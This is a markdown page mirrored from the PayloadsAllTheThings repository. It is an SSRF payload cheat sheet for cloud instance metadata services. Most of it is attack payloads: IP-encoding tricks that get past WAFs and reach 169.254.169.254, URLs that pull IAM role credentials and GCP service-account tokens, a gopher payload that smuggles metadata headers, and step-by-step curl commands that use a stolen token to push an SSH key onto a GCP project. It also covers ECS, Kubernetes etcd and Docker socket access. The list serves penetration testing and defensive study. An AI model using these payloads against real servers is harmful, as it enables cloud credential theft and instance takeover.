ssrf-cloud-instances.md (12345B)
1 --- 2 title: "SSRF URL for Cloud Instances" 3 topic: "Server Side Request Forgery" 4 topicSlug: "server-side-request-forgery" 5 sourcePath: "Server Side Request Forgery/SSRF-Cloud-Instances.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Server%20Side%20Request%20Forgery/SSRF-Cloud-Instances.md" 7 sha: "3ac27901c711" 8 isReadme: false 9 --- 10 11 # SSRF URL for Cloud Instances 12 13 > When exploiting Server-Side Request Forgery (SSRF) in cloud environments, attackers often target metadata endpoints to retrieve sensitive instance information (e.g., credentials, configurations). Below is a categorized list of common URLs for various cloud and infrastructure providers 14 15 ## Summary 16 17 * [SSRF URL for AWS Bucket](#ssrf-url-for-aws) 18 * [SSRF URL for AWS ECS](#ssrf-url-for-aws-ecs) 19 * [SSRF URL for AWS Elastic Beanstalk](#ssrf-url-for-aws-elastic-beanstalk) 20 * [SSRF URL for AWS Lambda](#ssrf-url-for-aws-lambda) 21 * [SSRF URL for Google Cloud](#ssrf-url-for-google-cloud) 22 * [SSRF URL for Digital Ocean](#ssrf-url-for-digital-ocean) 23 * [SSRF URL for Packetcloud](#ssrf-url-for-packetcloud) 24 * [SSRF URL for Azure](#ssrf-url-for-azure) 25 * [SSRF URL for OpenStack/RackSpace](#ssrf-url-for-openstackrackspace) 26 * [SSRF URL for HP Helion](#ssrf-url-for-hp-helion) 27 * [SSRF URL for Oracle Cloud](#ssrf-url-for-oracle-cloud) 28 * [SSRF URL for Kubernetes ETCD](#ssrf-url-for-kubernetes-etcd) 29 * [SSRF URL for Alibaba](#ssrf-url-for-alibaba) 30 * [SSRF URL for Hetzner Cloud](#ssrf-url-for-hetzner-cloud) 31 * [SSRF URL for Docker](#ssrf-url-for-docker) 32 * [SSRF URL for Rancher](#ssrf-url-for-rancher) 33 * [References](#references) 34 35 ## SSRF URL for AWS 36 37 The AWS Instance Metadata Service is a service available within Amazon EC2 instances that allows those instances to access metadata about themselves. - [Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories) 38 39 * IPv4 endpoint (old): `http://169.254.169.254/latest/meta-data/` 40 * IPv4 endpoint (new) requires the header `X-aws-ec2-metadata-token` 41 42 ```powershell 43 export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"` 44 curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data" 45 ``` 46 47 * IPv6 endpoint: `http://[fd00:ec2::254]/latest/meta-data/` 48 49 In case of a WAF, you might want to try different ways to connect to the API. 50 51 * DNS record pointing to the AWS API IP 52 53 ```powershell 54 http://instance-data 55 http://169.254.169.254 56 http://169.254.169.254.nip.io/ 57 ``` 58 59 * HTTP redirect 60 61 ```powershell 62 Static:http://nicob.net/redir6a 63 Dynamic:http://nicob.net/redir-http-169.254.169.254:80- 64 ``` 65 66 * Encoding the IP to bypass WAF 67 68 ```powershell 69 http://425.510.425.510 Dotted decimal with overflow 70 http://2852039166 Dotless decimal 71 http://7147006462 Dotless decimal with overflow 72 http://0xA9.0xFE.0xA9.0xFE Dotted hexadecimal 73 http://0xA9FEA9FE Dotless hexadecimal 74 http://0x41414141A9FEA9FE Dotless hexadecimal with overflow 75 http://0251.0376.0251.0376 Dotted octal 76 http://0251.00376.000251.0000376 Dotted octal with padding 77 http://0251.254.169.254 Mixed encoding (dotted octal + dotted decimal) 78 http://[::ffff:a9fe:a9fe] IPV6 Compressed 79 http://[0:0:0:0:0:ffff:a9fe:a9fe] IPV6 Expanded 80 http://[0:0:0:0:0:ffff:169.254.169.254] IPV6/IPV4 81 http://[fd00:ec2::254] IPV6 82 ``` 83 84 These URLs return a list of IAM roles associated with the instance. You can then append the role name to this URL to retrieve the security credentials for the role. 85 86 ```powershell 87 http://169.254.169.254/latest/meta-data/iam/security-credentials 88 http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] 89 ``` 90 91 This URL is used to access the user data that was specified when launching the instance. User data is often used to pass startup scripts or other configuration information into the instance. 92 93 ```powershell 94 http://169.254.169.254/latest/user-data 95 ``` 96 97 Other URLs to query to access various pieces of metadata about the instance, like the hostname, public IPv4 address, and other properties. 98 99 ```powershell 100 http://169.254.169.254/latest/meta-data/ 101 http://169.254.169.254/latest/meta-data/ami-id 102 http://169.254.169.254/latest/meta-data/reservation-id 103 http://169.254.169.254/latest/meta-data/hostname 104 http://169.254.169.254/latest/meta-data/public-keys/ 105 http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key 106 http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key 107 http://169.254.169.254/latest/dynamic/instance-identity/document 108 ``` 109 110 **Examples**: 111 112 * Jira SSRF leading to AWS info disclosure - `https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1/maintenance` 113 * *Flaws challenge - `http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/` 114 115 ## SSRF URL for AWS ECS 116 117 If you have an SSRF with file system access on an ECS instance, try extracting `/proc/self/environ` to get UUID. 118 119 ```powershell 120 curl http://169.254.170.2/v2/credentials/<UUID> 121 ``` 122 123 This way you'll extract IAM keys of the attached role 124 125 ## SSRF URL for AWS Elastic Beanstalk 126 127 We retrieve the `accountId` and `region` from the API. 128 129 ```powershell 130 http://169.254.169.254/latest/dynamic/instance-identity/document 131 http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role 132 ``` 133 134 We then retrieve the `AccessKeyId`, `SecretAccessKey`, and `Token` from the API. 135 136 ```powershell 137 http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role 138 ``` 139 140 Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`. 141 142 ## SSRF URL for AWS Lambda 143 144 AWS Lambda provides an HTTP API for custom runtimes to receive invocation events from Lambda and send response data back within the Lambda execution environment. 145 146 ```powershell 147 http://localhost:9001/2018-06-01/runtime/invocation/next 148 http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next 149 ``` 150 151 Docs: <https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html#runtimes-api-next> 152 153 ## SSRF URL for Google Cloud 154 155 :warning: Google is shutting down support for usage of the **v1 metadata service** on January 15. 156 157 Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" 158 159 ```powershell 160 http://169.254.169.254/computeMetadata/v1/ 161 http://metadata.google.internal/computeMetadata/v1/ 162 http://metadata/computeMetadata/v1/ 163 http://metadata.google.internal/computeMetadata/v1/instance/hostname 164 http://metadata.google.internal/computeMetadata/v1/instance/id 165 http://metadata.google.internal/computeMetadata/v1/project/project-id 166 ``` 167 168 Google allows recursive pulls 169 170 ```powershell 171 http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true 172 ``` 173 174 Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn) 175 176 ```powershell 177 http://metadata.google.internal/computeMetadata/v1beta1/ 178 http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true 179 ``` 180 181 Required headers can be set using a gopher SSRF with the following technique 182 183 ```powershell 184 gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a 185 ``` 186 187 Interesting files to pull out: 188 189 * SSH Public Key : `http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json` 190 * Get Access Token : `http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token` 191 * Kubernetes Key : `http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json` 192 193 ### Add an SSH key 194 195 Extract the token 196 197 ```powershell 198 http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json 199 ``` 200 201 Check the scope of the token 202 203 ```powershell 204 $ curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=ya29.XXXXXKuXXXXXXXkGT0rJSA 205 206 { 207 "issued_to": "101302079XXXXX", 208 "audience": "10130207XXXXX", 209 "scope": "https://www.googleapis.com/auth/compute https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/devstorage.read_write https://www.googleapis.com/auth/monitoring", 210 "expires_in": 2443, 211 "access_type": "offline" 212 } 213 ``` 214 215 Now push the SSH key. 216 217 ```powershell 218 curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCommonInstanceMetadata" 219 -H "Authorization: Bearer ya29.c.EmKeBq9XI09_1HK1XXXXXXXXT0rJSA" 220 -H "Content-Type: application/json" 221 --data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}' 222 ``` 223 224 ## SSRF URL for Digital Ocean 225 226 Documentation available at `https://developers.digitalocean.com/documentation/metadata/` 227 228 ```powershell 229 curl http://169.254.169.254/metadata/v1/id 230 http://169.254.169.254/metadata/v1.json 231 http://169.254.169.254/metadata/v1/ 232 http://169.254.169.254/metadata/v1/id 233 http://169.254.169.254/metadata/v1/user-data 234 http://169.254.169.254/metadata/v1/hostname 235 http://169.254.169.254/metadata/v1/region 236 http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address 237 238 All in one request: 239 curl http://169.254.169.254/metadata/v1.json | jq 240 ``` 241 242 ## SSRF URL for Packetcloud 243 244 Documentation available at `https://metadata.packet.net/userdata` 245 246 ## SSRF URL for Azure 247 248 Limited, maybe more exists? `https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/` 249 250 ```powershell 251 http://169.254.169.254/metadata/v1/maintenance 252 ``` 253 254 Update Apr 2017, Azure has more support; requires the header "Metadata: true" `https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service` 255 256 ```powershell 257 http://169.254.169.254/metadata/instance?api-version=2017-04-02 258 http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text 259 ``` 260 261 ## SSRF URL for OpenStack/RackSpace 262 263 (header required? unknown) 264 265 ```powershell 266 http://169.254.169.254/openstack 267 ``` 268 269 ## SSRF URL for HP Helion 270 271 (header required? unknown) 272 273 ```powershell 274 http://169.254.169.254/2009-04-04/meta-data/ 275 ``` 276 277 ## SSRF URL for Oracle Cloud 278 279 ```powershell 280 http://192.0.0.192/latest/ 281 http://192.0.0.192/latest/user-data/ 282 http://192.0.0.192/latest/meta-data/ 283 http://192.0.0.192/latest/attributes/ 284 ``` 285 286 ## SSRF URL for Alibaba 287 288 ```powershell 289 http://100.100.100.200/latest/meta-data/ 290 http://100.100.100.200/latest/meta-data/instance-id 291 http://100.100.100.200/latest/meta-data/image-id 292 ``` 293 294 ## SSRF URL for Hetzner Cloud 295 296 ```powershell 297 http://169.254.169.254/hetzner/v1/metadata 298 http://169.254.169.254/hetzner/v1/metadata/hostname 299 http://169.254.169.254/hetzner/v1/metadata/instance-id 300 http://169.254.169.254/hetzner/v1/metadata/public-ipv4 301 http://169.254.169.254/hetzner/v1/metadata/private-networks 302 http://169.254.169.254/hetzner/v1/metadata/availability-zone 303 http://169.254.169.254/hetzner/v1/metadata/region 304 ``` 305 306 ## SSRF URL for Kubernetes ETCD 307 308 Can contain API keys and internal ip and ports 309 310 ```powershell 311 curl -L http://127.0.0.1:2379/version 312 curl http://127.0.0.1:2379/v2/keys/?recursive=true 313 ``` 314 315 ## SSRF URL for Docker 316 317 ```powershell 318 http://127.0.0.1:2375/v1.24/containers/json 319 320 Simple example 321 docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash 322 bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json 323 bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json 324 ``` 325 326 More info: 327 328 * Daemon socket option: <https://docs.docker.com/engine/reference/commandline/dockerd/#daemon-socket-option> 329 * Docker Engine API: <https://docs.docker.com/engine/api/latest/> 330 331 ## SSRF URL for Rancher 332 333 ```powershell 334 curl http://rancher-metadata/<version>/<path> 335 ``` 336 337 More info: <https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/> 338 339 ## References 340 341 * [Extracting AWS metadata via SSRF in Google Acquisition - tghawkins - December 13, 2017](https://web.archive.org/web/20180210093624/https://hawkinsecurity.com/2017/12/13/extracting-aws-metadata-via-ssrf-in-google-acquisition/) 342 * [Exploiting SSRF in AWS Elastic Beanstalk - Sunil Yadav - February 1, 2019](https://web.archive.org/web/20251113080112/https://notsosecure.com/exploiting-ssrf-aws-elastic-beanstalk)